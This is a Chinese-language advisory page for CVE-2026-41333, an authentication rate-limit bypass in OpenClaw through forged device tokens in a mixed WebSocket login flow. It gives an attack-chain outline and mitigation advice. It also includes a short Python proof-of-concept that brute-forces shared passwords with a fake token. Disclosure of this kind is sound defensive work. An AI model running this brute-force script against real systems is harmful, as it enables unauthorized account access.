CVE-2026-41333 CVSS 3.7 低危

CVE-2026-41333 OpenClaw认证速率限制绕过漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41333

漏洞类型

认证绕过

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026年3月31日之前的版本中存在一个认证速率限制绕过漏洞。该漏洞允许攻击者利用伪造的设备令牌来规避共享认证保护机制。通过利用混合的WebSocket身份验证流程，攻击者能够成功绕过系统的速率限制控制，进而针对弱共享密码发起暴力破解攻击。成功利用此漏洞可能导致账户被非法访问，威胁系统安全。

技术细节

该漏洞的根本原因在于OpenClaw在处理WebSocket认证请求时，对设备令牌的校验逻辑存在缺陷。攻击者可以通过发送带有伪造或无效设备令牌的请求，触发混合认证流程。由于系统未能正确验证这些令牌的合法性，导致速率限制机制失效。攻击者利用这一缺陷，可以在没有频率限制的情况下，持续发送不同的密码尝试进行暴力破解。这使得攻击者能够以极高的效率猜测出弱共享密码，从而绕过认证壁垒获取系统访问权限。官方在后续版本中修复了设备令牌的验证逻辑。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是存在漏洞的OpenClaw版本（2026.3.31之前）。

STEP 2

漏洞利用

攻击者构造包含伪造设备令牌的WebSocket连接请求，触发混合认证流程。

STEP 3

绕过限制

由于伪造令牌未触发速率限制机制，攻击者绕过了对认证请求频率的约束。

STEP 4

暴力破解

攻击者利用绕过后的通道，对共享密码进行大规模的暴力破解尝试。

STEP 5

获取访问权

一旦猜中正确的密码，攻击者即可通过认证并获取系统的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets
import json

# Proof of Concept for CVE-2026-41333
# This script demonstrates bypassing rate limiting using a fake device token.

async def brute_force_attack(target_url, passwords):
    # Fake device token to bypass rate limiting
    fake_device_token = "fake_token_12345"
    
    for password in passwords:
        try:
            async with websockets.connect(target_url) as websocket:
                # Construct the authentication payload
                payload = {
                    "action": "authenticate",
                    "token": fake_device_token,
                    "password": password
                }
                
                # Send payload
                await websocket.send(json.dumps(payload))
                
                # Receive response
                response = await websocket.recv()
                print(f"Tried '{password}': {response}")
                
                if "success" in response:
                    print(f"[+] Password found: {password}")
                    break
        except Exception as e:
            print(f"Error with password {password}: {e}")

if __name__ == "__main__":
    target = "ws://vulnerable-openclaw-instance/ws/auth"
    common_passwords = ["123456", "password", "admin", "123456789"]
    asyncio.run(brute_force_attack(target, common_passwords))

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在无法立即升级的情况下，建议通过网络设备（如防火墙或WAF）对WebSocket接口实施严格的速率限制规则，并暂时监控或阻止包含异常设备令牌的请求。同时，强制所有用户更改弱密码为高强度密码。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表